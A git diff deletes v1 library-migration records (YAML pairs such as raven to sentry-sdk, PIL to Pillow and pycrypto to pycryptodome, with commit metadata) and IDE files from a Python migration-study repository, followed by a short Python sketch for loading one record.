-target: urllib3
-repo: jcjorel/clonesquad-ec2-pet-autoscaler
-commit: dd3b2664b930544a60dffe749193cc766ddd1a03
-pair_id: urllib,urllib3
-commit_message: (Bug/Minor) Updated Python dependencies to latest versions (Fix GitHub
-  Dependabot alert about urllib3 version <=1.26.5)
-commit_url: https://github.com/jcjorel/clonesquad-ec2-pet-autoscaler/commit/dd3b2664
-code_changes: []
diff --git a/v1/data/migration/dec4ae0_scapy-python3,scapy.yaml b/v1/data/migration/dec4ae0_scapy-python3,scapy.yaml
deleted file mode 100644
index d0260c1..0000000
--- a/v1/data/migration/dec4ae0_scapy-python3,scapy.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: dec4ae0_scapy-python3,scapy
-source: scapy-python3
-target: scapy
-repo: tklab-tud/id2t
-commit: dec4ae016d18537f225dd3dac52c70ccdb973d58
-pair_id: scapy-python3,scapy
-commit_message: update scapy-python3 to scapy 2.4.2
-commit_url: https://github.com/tklab-tud/id2t/commit/dec4ae01
-code_changes: []
diff --git a/v1/data/migration/df57533_raven,sentry-sdk.yaml b/v1/data/migration/df57533_raven,sentry-sdk.yaml
deleted file mode 100644
index 1727f62..0000000
--- a/v1/data/migration/df57533_raven,sentry-sdk.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: df57533_raven,sentry-sdk
-source: raven
-target: sentry-sdk
-repo: anikalegal/clerk
-commit: df57533f6105b3ef513990ede61d8523a3674486
-pair_id: raven,sentry-sdk
-commit_message: Add staging environment
-commit_url: https://github.com/anikalegal/clerk/commit/df57533f
-code_changes: []
diff --git a/v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml b/v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml
deleted file mode 100644
index c83a05f..0000000
--- a/v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: e192ca6_pycrypto,pycryptodome
-source: pycrypto
-target: pycryptodome
-repo: hhyo/archery
-commit: e192ca69e2d610bc59a9f10165c7fd1c8ab9b157
-pair_id: pycrypto,pycryptodome
-commit_message: "\u89E3\u51B3\u5BC6\u7801\u52A0\u5BC6\u53EF\u80FD\u62A5\u9519\u7684\
-  \u95EE\u9898"
-commit_url: https://github.com/hhyo/archery/commit/e192ca69
-code_changes:
-- filepath: sql/utils/aes_decryptor.py
-  lines:
-  - '26:26'
diff --git a/v1/data/migration/e38ec14_raven,sentry-sdk.yaml b/v1/data/migration/e38ec14_raven,sentry-sdk.yaml
deleted file mode 100644
index 6e310f4..0000000
--- a/v1/data/migration/e38ec14_raven,sentry-sdk.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: e38ec14_raven,sentry-sdk
-source: raven
-target: sentry-sdk
-repo: hypothesis/bouncer
-commit: e38ec148f5bad94648d338eea691d44abd4bdf5d
-pair_id: raven,sentry-sdk
-commit_message: Replace the raven dependency with `h_pyramid_sentry`
-commit_url: https://github.com/hypothesis/bouncer/commit/e38ec148
-code_changes: []
diff --git a/v1/data/migration/e418cdc_pil,pillow.yaml b/v1/data/migration/e418cdc_pil,pillow.yaml
deleted file mode 100644
index 9d28609..0000000
--- a/v1/data/migration/e418cdc_pil,pillow.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: e418cdc_pil,pillow
-source: pil
-target: pillow
-repo: pyav-org/pyav
-commit: e418cdc8034dc2dac3379fa28087e739449c1c7d
-pair_id: pil,pillow
-commit_message: Test using Pillow instead of PIL
-commit_url: https://github.com/pyav-org/pyav/commit/e418cdc8
-code_changes: []
diff --git a/v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml b/v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml
deleted file mode 100644
index b4a73b2..0000000
--- a/v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-id: e5073e4_pymilvus-orm,pymilvus
-source: pymilvus-orm
-target: pymilvus
-repo: milvus-io/bootcamp
-commit: e5073e4c0c3e799822e939268d80c8f0601ea4cf
-pair_id: pymilvus-orm,pymilvus
-commit_message: update video analysis
-commit_url: https://github.com/milvus-io/bootcamp/commit/e5073e4c
-code_changes:
-- filepath: solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py
  lines:
-  - 2-5,7:3
-- filepath: solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py
-  lines:
-  - 2-5,7:3
diff --git a/v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml b/v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml
deleted file mode 100644
index e2276b1..0000000
--- a/v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml
+++ /dev/null
@@ -1,10 +0,0 @@
-id: e6b17da_pycrypto,pycryptodome
-source: pycrypto
-target: pycryptodome
-repo: jumpserver/jumpserver
-commit: e6b17da57dd2ef030d29894fde7e9340b324776d
-pair_id: pycrypto,pycryptodome
-commit_message: "perf: \u53BB\u6389pycrypto\u5E93\n\nperf: \u663E\u793A\u6DFB\u52A0\
-  pycryptodome"
-commit_url: https://github.com/jumpserver/jumpserver/commit/e6b17da5
-code_changes: []
diff --git a/v1/data/migration/e706486_slackclient,slack-sdk.yaml b/v1/data/migration/e706486_slackclient,slack-sdk.yaml
deleted file mode 100644
index ad33c35..0000000
--- a/v1/data/migration/e706486_slackclient,slack-sdk.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: e706486_slackclient,slack-sdk
-source: slackclient
-target: slack-sdk
-repo: ansible/awx
-commit: e7064868b43e281bc48dd9edde71d993b52c72b2
-pair_id: slackclient,slack-sdk
-commit_message: 'updates the implementation of the slack backend for notifications
-
-
-  Use the slack_sdk instead of the deprecated slackclient. Because according to the
-  official documentation:
-
-  > The slackclient PyPI project is in maintenance mode now and slack-sdk project
-  is the successor.
-
-  With this commit one UPGRADE BLOCKER from requirements/requirements.in is removed.
-  Als the license for slack_sdk
-
-  is updated and unit tests for slack notifications backend are added.
-
-
-  Signed-off-by: Daniel Ziegenberg '
-commit_url: https://github.com/ansible/awx/commit/e7064868
-code_changes: []
diff --git a/v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml b/v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml
deleted file mode 100644
index ed975ca..0000000
--- a/v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: e7d4fd5_fuzzywuzzy,rapidfuzz
-source: fuzzywuzzy
-target: rapidfuzz
-repo: nlpia/nlpia-bot
-commit: e7d4fd555779cd407fa5e09e1944b2ba56c5db12
-pair_id: fuzzywuzzy,rapidfuzz
-commit_message: 'use rapidfuzz instead of fuzzywuzzy
-
-
-
-  Former-commit-id: 53c3bce9c5f9bcec87475759fe040289d45ba1d6'
-commit_url: https://github.com/nlpia/nlpia-bot/commit/e7d4fd55
-code_changes: []
diff --git a/v1/data/migration/ea23791_raven,sentry-sdk.yaml b/v1/data/migration/ea23791_raven,sentry-sdk.yaml
deleted file mode 100644
index 91811e6..0000000
--- a/v1/data/migration/ea23791_raven,sentry-sdk.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: ea23791_raven,sentry-sdk
-source: raven
-target: sentry-sdk
-repo: agdsn/sipa
-commit: ea23791cfdc36d614189418a01a57c78859fa5e8
-pair_id: raven,sentry-sdk
-commit_message: Use sentry SDK instead of raven
-commit_url: https://github.com/agdsn/sipa/commit/ea23791c
-code_changes:
-- filepath: sipa/initialization.py
-  lines:
-  - 186-187:189-194
-  - 9-11:8,12
diff --git a/v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml b/v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml
deleted file mode 100644
index 6f225e4..0000000
--- a/v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: ee4d526_pyyaml,ruamel.yaml
-source: pyyaml
-target: ruamel.yaml
-repo: cloud-custodian/cloud-custodian
-commit: ee4d52689e1f4965439b2d360c89eddf8767a935
-pair_id: pyyaml,ruamel.yaml
-commit_message: tools/c7n_mailer port to py36 (#1417)
-commit_url: https://github.com/cloud-custodian/cloud-custodian/commit/ee4d5268
-code_changes:
-- filepath: tools/c7n_mailer/c7n_mailer/replay.py
-  lines:
-  - '21:21'
-- filepath: tools/c7n_mailer/c7n_mailer/utils.py
-  lines:
-  - '18:20'
-- filepath: tools/c7n_mailer/c7n_mailer/cli.py
-  lines:
-  - '8:8'
diff --git a/v1/data/migration/f0761b8_scapy-python3,scapy.yaml b/v1/data/migration/f0761b8_scapy-python3,scapy.yaml
deleted file mode 100644
index 6ad7f68..0000000
--- a/v1/data/migration/f0761b8_scapy-python3,scapy.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: f0761b8_scapy-python3,scapy
-source: scapy-python3
-target: scapy
-repo: plizonczyk/noiseprotocol
-commit: f0761b888a80201e28adb9fc2f614b997c868127
-pair_id: scapy-python3,scapy
-commit_message: 'Update scapy
-
-
-  scapy-python3 is an unofficial fork that is getting very oudated (many bug fixes
-  missing).
-
-  Migrates to original and up-to-date scapy, which now supports both python 2 and
-  3'
-commit_url: https://github.com/plizonczyk/noiseprotocol/commit/f0761b88
-code_changes: []
diff --git a/v1/data/migration/f08e9f1_mysql-python,pymysql.yaml b/v1/data/migration/f08e9f1_mysql-python,pymysql.yaml
deleted file mode 100644
index 13a2d1c..0000000
--- a/v1/data/migration/f08e9f1_mysql-python,pymysql.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: f08e9f1_mysql-python,pymysql
-source: mysql-python
-target: pymysql
-repo: openstack/neutron
-commit: f08e9f1f53efa97e07f21ca72a940fcbeb4570e5
-pair_id: mysql-python,pymysql
-commit_message: 'Switch from MySQL-python to PyMySQL
-
-
-  As discussed in the Liberty Design Summit "Moving apps to Python 3"
-
-  cross-project workshop, the way forward in the near future is to
-
-  switch to the pure-python PyMySQL library as a default.
-
-
-  https://etherpad.openstack.org/p/liberty-cross-project-python3
-
-
-  Change-Id: I73e0fdb6eca70e7d029a40a2f6f17a7c0797a21d'
-commit_url: https://github.com/openstack/neutron/commit/f08e9f1f
-code_changes: []
diff --git a/v1/data/migration/f1120d3_raven,sentry-sdk.yaml b/v1/data/migration/f1120d3_raven,sentry-sdk.yaml
deleted file mode 100644
index d75f563..0000000
--- a/v1/data/migration/f1120d3_raven,sentry-sdk.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: f1120d3_raven,sentry-sdk
-source: raven
-target: sentry-sdk
-repo: pokainc/cfn-cross-region-export
-commit: f1120d34c2a71686e769995300ac7cf09f858e34
-pair_id: raven,sentry-sdk
-commit_message: 'Feat - Switch from SSM to outputs + SAM (#20)
-
-
-  * Feat - Switch from SSM to outputs + SAM
-
-
-  * Code Review - Tweak sentry + Remove unused
-
-
-  * Update exporter/lambda/cross_region_import_replication.py
-
-
-  Co-authored-by: Laurent Jalbert-Simard 
-
-
-  * Update exporter/lambda/cross_region_import_replication.py
-
-
-  Co-authored-by: Laurent Jalbert-Simard 
-
-
-  * Code Review - Change naming
-
-
-  Co-authored-by: Laurent Jalbert-Simard '
-commit_url: https://github.com/pokainc/cfn-cross-region-export/commit/f1120d34
-code_changes:
-- filepath: exporter/lambda/cross_region_import_replication.py
-  lines:
-  - 21-25:11
-  - 8-9:8-9
diff --git a/v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml b/v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml
deleted file mode 100644
index b755e75..0000000
--- a/v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml
+++ /dev/null
@@ -1,12 +0,0 @@
-id: f5ba90e_pyyaml,ruamel.yaml
-source: pyyaml
-target: ruamel.yaml
-repo: holgern/beem
-commit: f5ba90e2cc5bb88b29b173bae11ba46e06efecf7
-pair_id: pyyaml,ruamel.yaml
-commit_message: Switch to ruamel.yaml
-commit_url: https://github.com/holgern/beem/commit/f5ba90e2
-code_changes:
-- filepath: beem/utils.py
-  lines:
-  - '9:9'
diff --git a/v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml b/v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml
deleted file mode 100644
index 2dd1919..0000000
--- a/v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: f6230c7_py-bcrypt,bcrypt
-source: py-bcrypt
-target: bcrypt
-repo: weasyl/weasyl
-commit: f6230c731f662be1301bdc38f6ab9815c7441144
-pair_id: py-bcrypt,bcrypt
-commit_message: Implements pyca/bcrypt
-commit_url: https://github.com/weasyl/weasyl/commit/f6230c73
-code_changes:
-- filepath: weasyl/login.py
-  lines:
-  - 76:77
-  - 284:285
diff --git a/v1/data/migration/f69877c_python-ldap,ldap3.yaml b/v1/data/migration/f69877c_python-ldap,ldap3.yaml
deleted file mode 100644
index f464d8f..0000000
--- a/v1/data/migration/f69877c_python-ldap,ldap3.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: f69877c_python-ldap,ldap3
-source: python-ldap
-target: ldap3
-repo: thehive-project/cortex-analyzers
-commit: f69877cf2f81aa27b63e2c3c3f1072a6868aba4a
-pair_id: python-ldap,ldap3
-commit_message: use ldap3, add port/search_field, move templates
-commit_url: https://github.com/thehive-project/cortex-analyzers/commit/f69877cf
-code_changes: []
diff --git a/v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml b/v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml
deleted file mode 100644
index 2b79095..0000000
--- a/v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: f7d2ea4_raven,sentry-sdk
-source: raven
-target: sentry-sdk
-repo: uclapi/uclapi
-commit: f7d2ea4679405d7693ca8cd00992f11f1a2202ae
-pair_id: raven,sentry-sdk
-commit_message: ':sparkles: Migrate to Sentry'
-commit_url: https://github.com/uclapi/uclapi/commit/f7d2ea46
-code_changes: []
diff --git a/v1/data/migration/f970b54_pil,pillow.yaml b/v1/data/migration/f970b54_pil,pillow.yaml
deleted file mode 100644
index e684280..0000000
--- a/v1/data/migration/f970b54_pil,pillow.yaml
+++ /dev/null
@@ -1,12 +0,0 @@
-id: f970b54_pil,pillow
-source: pil
-target: pillow
-repo: rcos/observatory-retired
-commit: f970b543dc349460492a32a11731738062bfcc09
-pair_id: pil,pillow
-commit_message: Go to Pillow for images since PIL isn't updated
-commit_url: https://github.com/rcos/observatory-retired/commit/f970b543
-code_changes:
-- filepath: observatory/dashboard/models/Screenshot.py
-  lines:
-  - '15:15'
diff --git a/v1/data/migration/fe6b437_pil,pillow.yaml b/v1/data/migration/fe6b437_pil,pillow.yaml
deleted file mode 100644
index e560451..0000000
--- a/v1/data/migration/fe6b437_pil,pillow.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: fe6b437_pil,pillow
-source: pil
-target: pillow
-repo: henrysky/astronn
-commit: fe6b4379c5d84495cb30af0ad50931c871129f0f
-pair_id: pil,pillow
-commit_message: pillow not PIL [ci skip]
-commit_url: https://github.com/henrysky/astronn/commit/fe6b4379
-code_changes: []
diff --git a/v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml b/v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml
deleted file mode 100644
index ffe68c3..0000000
--- a/v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: fe8e65d_dotenv,python-dotenv
-source: dotenv
-target: python-dotenv
-repo: kaveio/kavetoolbox
-commit: fe8e65df6d05e3818627638104d3ca0730753657
-pair_id: dotenv,python-dotenv
-commit_message: Changing dotenv to python-dotenv
-commit_url: https://github.com/kaveio/kavetoolbox/commit/fe8e65df
-code_changes: []
diff --git a/v2/code/.idea/.gitignore b/v2/code/.idea/.gitignore
deleted file mode 100644
index 73f69e0..0000000
--- a/v2/code/.idea/.gitignore
+++ /dev/null
@@ -1,8 +0,0 @@
-# Default ignored files
-/shelf/
-/workspace.xml
-# Datasource local storage ignored files
-/dataSources/
-/dataSources.local.xml
-# Editor-based HTTP Client requests
-/httpRequests/
diff --git a/v2/code/.idea/PyMigStat.iml b/v2/code/.idea/PyMigStat.iml
deleted file mode 100644
index dc31529..0000000
--- a/v2/code/.idea/PyMigStat.iml
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/v2/code/.idea/inspectionProfiles/Project_Default.xml b/v2/code/.idea/inspectionProfiles/Project_Default.xml
deleted file mode 100644
index ee20a26..0000000
--- a/v2/code/.idea/inspectionProfiles/Project_Default.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/v2/code/.idea/inspectionProfiles/profiles_settings.xml b/v2/code/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index dd4c951..0000000
--- a/v2/code/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/v2/code/.idea/misc.xml b/v2/code/.idea/misc.xml
deleted file mode 100644
index 94865c7..0000000
--- a/v2/code/.idea/misc.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/v2/code/.idea/modules.xml b/v2/code/.idea/modules.xml
deleted file mode 100644
index b868114..0000000
--- a/v2/code/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/v2/code/.idea/other.xml b/v2/code/.idea/other.xml
deleted file mode 100644
index 640fd80..0000000
--- a/v2/code/.idea/other.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/v2/code/.idea/vcs.xml b/v2/code/.idea/vcs.xml
deleted file mode 100644
index 6c0b863..0000000
--- a/v2/code/.idea/vcs.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/v2/code/README.md b/v2/code/README.md
deleted file mode 100644
index cfe37f5..0000000
--- a/v2/code/README.md
+++ /dev/null
@@ -1,20 +0,0 @@
-This was moved here. The previous history can be found at https://github.com/ualberta-smr/PyMigStat.
-
-The part below is outdated.
-# PyMigrationStat
-Scripts for various analyses of Python migrations
-
-# External dependencies
-1. git
-2. rust-code-analysis CLI
-3. PyFlakes
-
-# Sequence for a full run
-1. CollectLibInfo.py
-2. FetchRepoList.py
-3. CreateRepoFiles.py
-4. download-repos.py
-5. CollectDependencyEvents.py
-6. CollectMigrations.py
-
-
diff --git a/v2/code/pymigstat/runnables/__init__.py b/v2/code/pymigstat/runnables/__init__.py
deleted file mode 100644
index e69de29..0000000
diff --git a/v2/code/pymigstat/taxonomy/__init__.py b/v2/code/pymigstat/taxonomy/__init__.py
deleted file mode 100644
index e69de29..0000000
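For anyone who still needs the v1 data that this patch removes from the working tree (it remains available in the release the README now points to), every deleted migration record above follows the same small YAML schema: `id`, `source`, `target`, `repo`, `commit`, `pair_id`, `commit_message`, `commit_url`, and `code_changes`, where each code change has a `filepath` and a list of `lines` entries. The sketch below is a minimal example of loading one record; it assumes PyYAML is installed, that the v1 files are checked out from the release, and that an entry such as `'2-5,7:3'` pairs removed source lines with added target lines, which is our reading of the records above rather than a documented format.

```python
# Minimal sketch, not part of this patch. Assumes PyYAML (`pip install pyyaml`)
# and a local copy of the v1 release data. The "removed:added" reading of the
# `lines` entries is an assumption inferred from the deleted records above.
import yaml


def expand_line_spec(spec):
    """Expand a spec like '2-5,7' into [2, 3, 4, 5, 7]."""
    numbers = []
    for part in spec.split(","):
        if "-" in part:
            start, end = part.split("-")
            numbers.extend(range(int(start), int(end) + 1))
        elif part:
            numbers.append(int(part))
    return numbers


with open("v1/data/migration/ea23791_raven,sentry-sdk.yaml") as f:
    record = yaml.safe_load(f)

print(f"{record['source']} -> {record['target']} in {record['repo']}")
for change in record["code_changes"]:
    for mapping in change["lines"]:
        # str() guards against YAML resolving an unquoted entry as a non-string.
        removed, added = str(mapping).split(":")
        print(f"  {change['filepath']}: removed lines {expand_line_spec(removed)},"
              f" added lines {expand_line_spec(added)}")
```

Records with `code_changes: []` (the majority above) carry only commit-level metadata, so the inner loop never runs for them.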